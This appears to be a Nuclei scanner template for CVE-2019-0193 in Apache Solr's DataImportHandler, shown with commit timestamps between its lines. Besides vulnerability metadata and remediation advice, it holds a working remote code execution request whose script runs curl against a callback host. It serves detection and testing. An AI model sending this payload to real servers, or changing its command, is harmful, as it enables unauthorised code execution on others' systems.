2021-08-09 16:27:30 +00:00
id : CVE-2019-0193
info :
2022-06-15 13:23:51 +00:00
name : Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
2021-08-09 16:27:30 +00:00
author : pdteam
2021-09-10 11:26:40 +00:00
severity : high
2022-06-20 17:35:07 +00:00
description : |
Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary commands on the affected system.
2023-09-06 12:53:28 +00:00
remediation : |
Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
2021-08-19 13:59:55 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/
2022-05-17 09:18:12 +00:00
- https://issues.apache.org/jira/browse/SOLR-13669
2022-06-15 13:23:51 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
2023-07-11 19:49:27 +00:00
- https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 7.2
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-0193
cwe-id : CWE-94
2024-03-23 09:28:19 +00:00
epss-score : 0.9605
epss-percentile : 0.99452
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : apache
product : solr
2024-01-14 09:21:50 +00:00
tags : cve2019,cve,apache,rce,solr,oast,kev,vulhub
2021-08-09 16:27:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-08-09 16:27:30 +00:00
- raw :
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host : {{Hostname}}
Accept-Language : en
Connection : close
- |
POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
Host : {{Hostname}}
Content-type : application/x-www-form-urlencoded
X-Requested-With : XMLHttpRequest
2022-08-24 08:56:43 +00:00
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
2021-08-09 16:27:30 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-08-09 16:27:30 +00:00
words :
- "http"
2023-05-30 23:51:18 +00:00
- type : word
part : interactsh_request
words :
- "User-Agent: curl"
2023-07-11 19:49:27 +00:00
extractors :
- type : regex
name : core
group : 1
regex :
- '"name"\:"(.*?)"'
internal : true
2024-01-30 06:46:18 +00:00
# digest: 4b0a00483046022100bed35d021bec41b624022e7ec2f16bba98844fa576d384a6a94ce644b4b93ed002210092de9cfbd32f1e19694b329ec0c0aa23d41115188d36df299b7ac65a10ac6524:922c64590222798bb761d5b6d8e72950